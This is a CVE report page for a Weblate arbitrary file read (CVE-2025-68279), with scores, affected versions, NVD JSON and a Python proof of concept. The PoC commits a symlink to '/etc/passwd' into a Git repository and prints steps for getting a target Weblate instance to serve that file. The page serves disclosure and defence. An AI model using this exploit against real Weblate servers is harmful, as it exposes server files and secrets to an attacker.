Security Vulnerability Report
CVE-2025-68279 CVSS 7.7 HIGH

CVE-2025-68279

Published: 2025-12-18 23:15:49
Last Modified: 2026-01-02 16:33:55

Description

Weblate is a web based localization tool. In versions prior to 5.15.1, it was possible to read arbitrary files from the server file system using crafted symbolic links in the repository. Version 5.15.1 fixes the issue.

CVSS Details

CVSS Score
7.7 (secondary/CNA assessment, scope changed; the NVD primary assessment in the Raw JSON Data below scores the same issue 6.5 MEDIUM with scope unchanged)
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:weblate:weblate:*:*:*:*:*:*:*:* - VULNERABLE
Weblate < 5.15.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-68279 PoC: Weblate Arbitrary File Read via Symlink

This script only builds a local Git repository that contains a single
symbolic link; it never contacts a Weblate instance. The vulnerable
behaviour (the checkout following the link when Weblate serves file
content; CWE-22/CWE-59/CWE-200 per the NVD record) is exercised only if
such a repository is later processed by an unpatched Weblate (< 5.15.1).

Defensive relevance: the artefact to look for when scanning repository
content is a symlink entry (git mode 120000) whose target is an absolute
path outside the checkout; upgrading to Weblate 5.15.1 removes the
file-read behaviour.
"""
import os
import subprocess
import tempfile


def create_malicious_repo(target_file: str, output_dir: str) -> bool:
    """
    Create a Git repository in output_dir containing a symlink named
    'readme.txt' that points at target_file, and commit it.

    Args:
        target_file: Path the symlink will point to (e.g., '/etc/passwd').
        output_dir: Directory in which the repository is created.

    Returns:
        True once the symlink has been committed, False if os.symlink fails.

    Raises:
        subprocess.CalledProcessError: if any git command exits non-zero
            (check=True); its output is captured, not printed, so the
            underlying git error is not shown to the user.

    Side effects:
        Changes the process-wide working directory to output_dir and does
        not restore it.
    """
    os.makedirs(output_dir, exist_ok=True)
    # NOTE(review): process-wide chdir that is never undone; the absolute
    # os.path.join(output_dir, ...) below means the git calls could instead
    # pass cwd=output_dir and leave the caller's cwd alone.
    os.chdir(output_dir)
    # Initialize git repo (every git call relies on the cwd set above)
    subprocess.run(['git', 'init'], check=True, capture_output=True)
    subprocess.run(['git', 'config', 'user.email', '[email protected]'], check=True, capture_output=True)
    subprocess.run(['git', 'config', 'user.name', 'Attacker'], check=True, capture_output=True)
    # Create symlink to target file
    # In a real attack, this would be pushed to a repository the target Weblate instance processes
    symlink_path = os.path.join(output_dir, 'readme.txt')
    # NOTE(review): os.path.exists follows the link, so a pre-existing
    # dangling symlink at this path reports False, is not removed, and the
    # os.symlink below then raises FileExistsError (an OSError) -> False.
    if os.path.exists(symlink_path):
        os.remove(symlink_path)
    try:
        os.symlink(target_file, symlink_path)
        print(f'[+] Created symlink: {symlink_path} -> {target_file}')
    except OSError as e:
        # Covers platforms/users without symlink privileges as well as
        # FileExistsError from the case described above.
        print(f'[-] Failed to create symlink: {e}')
        return False
    # Add and commit. Git stores the link itself (its target path), not the
    # content of target_file; nothing sensitive is read on this machine.
    subprocess.run(['git', 'add', '.'], check=True, capture_output=True)
    subprocess.run(['git', 'commit', '-m', 'Add symlink to sensitive file'], check=True, capture_output=True)
    print(f'[+] Malicious repository created in: {output_dir}')
    print(f'[+] Target file: {target_file}')
    print(f'[+] After Weblate processes this repo, check the file content in the Weblate interface')
    return True


def main() -> int:
    """
    Build the demo repository in a fresh temporary directory and report
    what was created.

    Returns:
        0 if the repository and symlink were created, 1 otherwise.

    The temporary directory from tempfile.mkdtemp is not cleaned up.
    """
    # Configuration
    target_file = '/etc/passwd'  # Can be changed to any file readable by Weblate process
    output_dir = tempfile.mkdtemp(prefix='cve_2025_68279_')
    print('=' * 60)
    print('CVE-2025-68279 PoC: Weblate Arbitrary File Read')
    print('=' * 60)
    # Create malicious repository
    success = create_malicious_repo(target_file, output_dir)
    if success:
        print('\n[*] Next steps for exploitation:')
        print(f' 1. Push the repository in {output_dir} to a Git hosting service')
        print(' 2. Add this repository to target Weblate instance')
        print(' 3. Trigger repository update/pull in Weblate')
        print(' 4. View the file content through Weblate\'s file browser or translation interface')
        print('\n[*] Note: This PoC creates the symlink locally.')
        print(' In real attack, the symlink is pushed to remote repo Weblate will clone.')
    return 0 if success else 1


if __name__ == '__main__':
    # NOTE(review): the bare exit() builtin is installed by the site module;
    # sys.exit is the conventional form for scripts.
    exit(main())

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68279", "sourceIdentifier": "[email protected]", "published": "2025-12-18T23:15:48.863", "lastModified": "2026-01-02T16:33:54.523", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Weblate is a web based localization tool. In versions prior to 5.15.1, it was possible to read arbitrary files from the server file system using crafted symbolic links in the repository. Version 5.15.1 fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-59"}, {"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:weblate:weblate:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.15.1", "matchCriteriaId": "D694E7D3-F4E0-44F5-B2EE-9B6EDDA4607F"}]}]}], "references": [{"url": "https://github.com/WeblateOrg/weblate/pull/17331", "source": "[email protected]", "tags": ["Issue Tracking", 
"Patch"]}, {"url": "https://github.com/WeblateOrg/weblate/pull/17356", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/WeblateOrg/weblate/releases/tag/weblate-5.15.1", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/WeblateOrg/weblate/security/advisories/GHSA-g925-f788-4jh7", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}